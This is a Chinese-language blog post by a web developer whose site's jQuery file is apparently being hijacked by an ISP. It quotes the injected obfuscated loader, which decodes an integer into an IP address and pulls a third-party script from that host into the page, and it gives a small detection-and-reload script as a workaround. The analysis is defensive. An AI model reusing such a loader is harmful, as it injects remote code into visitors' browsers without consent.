前言：一直以來有一個問題困擾著我，就是網頁的js被人替換掉，然後造成自己辛辛苦苦寫的程式碼，變成了bug程式碼，，無奈之下，嘗試過工信部投訴，但是投訴沒多久，牛皮癬出來了，為了暫時解決這個問題，就臨時想了一個辦法解決。

    一、首先看一下我的js被替換成什麼樣子了。

    上圖是第1個jqeury被替換了，如果有多個外部js，那麼每次大概有5分之1的概率被劫持1個隨機的外部js。

!function(e, t, n, o, r, i, a, c){
    c = function(e, t, n) {
        for (t = e % 256, n = 3; 0 < n; n--) t = (e = Math.floor(e / 256)) % 256 + "." + t;
        return t
    }(2095620274),
    (a = function(e){ r = t.createElement(n),i = t.getElementsByTagName(n)[0], r.src = "//" + e, 
    	i.parentNode.insertBefore(r, i)
    })(o + (0 < o.indexOf("?") ? "&": "?") + "_t" + (new Date).getTime() + "=0i"), a(c + "/v1/a/?u=3236477")
}(window, document, "script", "我的域名/static/help/js/jquery18min.js?t=23432423234");
 

    上面是被替換的jquery的程式碼

    解釋：

         外層自執行函式：
  e = window
  t = document
  n = script
  o = url //自己的js的地址
  內部c函式 ： 主方法主要根據e引數是生成ip地址，給第三個引數用
  e = 2095620274 = ip地址:124.232.160.178
  t = a = () 主要執行函式  //主要程式碼,在第一個script標籤前面建立被劫持的url的script標籤，有屁用。

  n = t(n) 等於執行t方法，只是url引數被替換成了/v1/a/?u=3236477. 

        就是在生產了2個script的dom,其中一個是去請求帶了時間戳的自己網站的被替換的js，第二個是建立劫持方的js。所以就有了上面的3個script標籤。

        問題：被劫持的js，採用這種方式生成的dom，會打亂載入順序被，所以，經常出現頁面無響應的問題。即xxx is undifiend，各種隨機出現。

   二、解決辦法

        在最後一個外部的js的標籤處增加一個判斷，如果被這個ip劫持了，(我們湖南地區被劫持都是這個ip)，就執行window.location.href = window.location.href

    具體加的程式碼如下:

<script type="text/javascript">
	function sfdianxinjiechi(){
		var ss = document.getElementsByTagName("script");
		var sfjc = false;  //是否劫持
		for (var i = 0; i < ss.length; i++) {
			if(ss[i].src.indexOf("124.232.160.178/v1/a/")>0){
				sfjc = true;
			}
		}
		return sfjc;
	};
	if(sfdianxinjiechi()){
		//最好再加上一段cookie計數的邏輯，比如一個1分鐘的cookie的key值中，判斷此情況重新整理次數，設定個上限。
		//如果不這樣，萬一每次都被劫持的話，那麼直接頁面無限刷了，直接被自己併發攻擊了。。。
		setTimeout(function(){
			//alret("電信ip:124.232.160.178劫持你的網路，請打電話投訴！");
			window.location.href = window.location.href;
		},200);
	};
</script>
 

結語： 弄個https可以徹底解決的。